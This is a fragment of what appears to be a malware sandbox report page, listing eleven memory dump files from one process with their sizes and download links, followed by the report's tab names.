memory/2692-45-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-46-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-47-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-48-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-49-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-50-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-52-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-33-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-35-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-26-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-28-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads